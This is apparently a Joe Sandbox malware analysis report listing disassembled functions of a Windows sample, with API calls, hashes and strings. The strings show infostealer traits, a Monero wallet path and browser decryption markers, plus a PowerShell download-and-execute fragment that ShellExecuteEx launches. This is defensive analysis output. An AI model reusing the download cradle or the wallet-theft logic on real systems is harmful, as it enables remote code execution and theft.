                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 7d385a1954924eac16d8023db4243a6ef660398ffe6dd973600a1f301258a83c
                            • Instruction ID: fbf33ee7e327a674f03f5298a029a5df83782aeb9dc83d59f109bf203034e271
                            • Opcode Fuzzy Hash: 7d385a1954924eac16d8023db4243a6ef660398ffe6dd973600a1f301258a83c
                            • Instruction Fuzzy Hash: C531F8B4A00218ABDB20CF94DC85BDDB7B9EB48704F1085D9F709A7281D7706AC58F99
                            Function 000F83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000F8426
                            • wsprintfA.USER32 ref: 000F8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000F847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 000F848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 000F8499
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                            • RegQueryValueExA.ADVAPI32(00000000,0122DF18,00000000,000F003F,?,00000400), ref: 000F84EC
                            • lstrlen.KERNEL32(?), ref: 000F8501
                            • RegQueryValueExA.ADVAPI32(00000000,0122DEE8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00100B34), ref: 000F8599
                            • RegCloseKey.ADVAPI32(00000000), ref: 000F8608
                            • RegCloseKey.ADVAPI32(00000000), ref: 000F861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: ec13a43bde151c401a6b21d939d70ea8c3a51d65016321301bae1e9befabebc1
                            • Instruction ID: c047bbdc5f6a5ec8cfba1619833e2167e6490fa7ff02711ce9dcdb93a4c8ffd0
                            • Opcode Fuzzy Hash: ec13a43bde151c401a6b21d939d70ea8c3a51d65016321301bae1e9befabebc1
                            • Instruction Fuzzy Hash: 5E21E9B1A1021CABDB64DB54DC85FE9B7B8FB48700F00C5D8E609A6180DF716A86CFD4
                            Function 000F7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F76A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F76AB
                            • RegOpenKeyExA.ADVAPI32(80000002,0121C010,00000000,00020119,00000000), ref: 000F76DD
                            • RegQueryValueExA.ADVAPI32(00000000,0122E098,00000000,00000000,?,000000FF), ref: 000F76FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 000F7708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 114295c3a4b1aeefa595078f8605234e067fa8e4ea751b39c6bb84e6ef58526b
                            • Instruction ID: dd9570eb6c0b3dcc7071c308391e9c99400c458ac7ba48b973ddbffe196fecae
                            • Opcode Fuzzy Hash: 114295c3a4b1aeefa595078f8605234e067fa8e4ea751b39c6bb84e6ef58526b
                            • Instruction Fuzzy Hash: 98018FB4A04308BBE711EBE4DC49FBDB7BCEB08701F104058FB08D7290D6B099019B52
                            Function 000F7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F7734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F773B
                            • RegOpenKeyExA.ADVAPI32(80000002,0121C010,00000000,00020119,000F76B9), ref: 000F775B
                            • RegQueryValueExA.ADVAPI32(000F76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 000F777A
                            • RegCloseKey.ADVAPI32(000F76B9), ref: 000F7784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 08385c6aa84bdb648756ac48b0d373798e368827c6bd4e416177bd33a5bc1c12
                            • Instruction ID: ad00f23c22612a909f0669c092bb3abe8ee481180e5ab5618c58c81cae674acb
                            • Opcode Fuzzy Hash: 08385c6aa84bdb648756ac48b0d373798e368827c6bd4e416177bd33a5bc1c12
                            • Instruction Fuzzy Hash: 3A0167B5A40308BBDB11DBE4DC49FBEB7BCEB48700F104558FB05A7281D77055018B52
                            Function 000E99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000E99EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 000E9A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000E9A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,000E148F,00000000), ref: 000E9A5A
                            • LocalFree.KERNEL32(000E148F), ref: 000E9A90
                            • CloseHandle.KERNEL32(000000FF), ref: 000E9A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: d0b2e48abc938dbe4a17fcb9069a244a0cd24827b8dad9c4f0329355754e3474
                            • Instruction ID: 1df1f5221b5e38f10b9baf6b4f4c36a3e5c6278344405503b655754f9d3d6918
                            • Opcode Fuzzy Hash: d0b2e48abc938dbe4a17fcb9069a244a0cd24827b8dad9c4f0329355754e3474
                            • Instruction Fuzzy Hash: A3311AB4A00209EFDB24CF95D985BEE77F9FF48340F148168E915A7290D774AA41CFA2
                            Function 000F4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,0122E2A8), ref: 000F47DB
                              • Part of subcall function 000F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000F8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 000F4801
                            • lstrcat.KERNEL32(?,?), ref: 000F4820
                            • lstrcat.KERNEL32(?,?), ref: 000F4834
                            • lstrcat.KERNEL32(?,0121B680), ref: 000F4847
                            • lstrcat.KERNEL32(?,?), ref: 000F485B
                            • lstrcat.KERNEL32(?,0122D8E0), ref: 000F486F
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000F8D90: GetFileAttributesA.KERNEL32(00000000,?,000E1B54,?,?,0010564C,?,?,00100E1F), ref: 000F8D9F
                              • Part of subcall function 000F4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000F4580
                              • Part of subcall function 000F4570: RtlAllocateHeap.NTDLL(00000000), ref: 000F4587
                              • Part of subcall function 000F4570: wsprintfA.USER32 ref: 000F45A6
                              • Part of subcall function 000F4570: FindFirstFileA.KERNEL32(?,?), ref: 000F45BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 309ad9460adf9e4d47473455f9dfd3b442a03ca676dec698278b8a7c59da8a08
                            • Instruction ID: 151fe887fa0978714deed8a825a086e8f02e12ed3ec7526895cc565048a2fdb8
                            • Opcode Fuzzy Hash: 309ad9460adf9e4d47473455f9dfd3b442a03ca676dec698278b8a7c59da8a08
                            • Instruction Fuzzy Hash: 8A3162B690021C97CB21F7A0DC85EFD737CAB48700F44458DF71996082EEB4D6899B91
                            Function 000F2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000F2D85
                            Strings
                            • ')", xrefs: 000F2CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 000F2D04
                            • <, xrefs: 000F2D39
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 000F2CC4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 3dda2fe2f55eea2c4855bffc05c0fbd4aa6f69dc3ec232fd6ec3166032cb9c81
                            • Instruction ID: ca81d7999127304de09ef27fd0e554e248d41a1350033870a6b78832f9b9d47e
                            • Opcode Fuzzy Hash: 3dda2fe2f55eea2c4855bffc05c0fbd4aa6f69dc3ec232fd6ec3166032cb9c81
                            • Instruction Fuzzy Hash: EA41E0B1D0020C9ADB14FBA0C892BFDB774AF15340F508019E20AA6596DFB42A4BDF92
                            Function 000E9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000E9F41
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: 80ca313faed1369e7637eaacaef1d7976506a4dc6d68cc2d4b707b6cbdce1ae4
                            • Instruction ID: fefae4792f6123b45c7e4b868998d759eab194f6e30ff8e0bc668c4011194eaa
                            • Opcode Fuzzy Hash: 80ca313faed1369e7637eaacaef1d7976506a4dc6d68cc2d4b707b6cbdce1ae4
                            • Instruction Fuzzy Hash: B4613171A1024CEFDB24EFA5CC95FED7775AF85340F008018FA096B592DBB46A06CB52
                            Function 000F40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0122D740,00000000,00020119,?), ref: 000F40F4
                            • RegQueryValueExA.ADVAPI32(?,0122E2F0,00000000,00000000,00000000,000000FF), ref: 000F4118
                            • RegCloseKey.ADVAPI32(?), ref: 000F4122
                            • lstrcat.KERNEL32(?,00000000), ref: 000F4147
                            • lstrcat.KERNEL32(?,0122E380), ref: 000F415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 790e8db92b5c816b4a6dd4a670463a2d6fb1f24297a9acd876a16479efa38aa8
                            • Instruction ID: 0a14eee3d803910716f2e0d2da5fc14a338c3f8441f4f05a3792a86b3c43db2e
                            • Opcode Fuzzy Hash: 790e8db92b5c816b4a6dd4a670463a2d6fb1f24297a9acd876a16479efa38aa8
                            • Instruction Fuzzy Hash: 3D4188B6D00208ABDB25EBA0DC46FFE737DAB88300F00455CB71556182EA759B898B92
                            Function 000F7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F7E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F7E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,0121BF68,00000000,00020119,?), ref: 000F7E5E
                            • RegQueryValueExA.ADVAPI32(?,0122D9A0,00000000,00000000,000000FF,000000FF), ref: 000F7E7F
                            • RegCloseKey.ADVAPI32(?), ref: 000F7E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: c4194906675bb7c51d887ba21a9d03abdab0ea2fa3295c78e1ef1f9578104348
                            • Instruction ID: d33fba5244a5e82cef13cca74370d3a8d4ea88cb42090cb7f5ce4858bb407509
                            • Opcode Fuzzy Hash: c4194906675bb7c51d887ba21a9d03abdab0ea2fa3295c78e1ef1f9578104348
                            • Instruction Fuzzy Hash: C2116AB1A44609EBD725CB98DD4AFBBBBBCEB48B10F10411AF705A7680D77458019BA2
                            Function 000F9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(0122E008,?,?,?,000F140C,?,0122E008,00000000), ref: 000F926C
                            • lstrcpyn.KERNEL32(0032AB88,0122E008,0122E008,?,000F140C,?,0122E008), ref: 000F9290
                            • lstrlen.KERNEL32(?,?,000F140C,?,0122E008), ref: 000F92A7
                            • wsprintfA.USER32 ref: 000F92C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
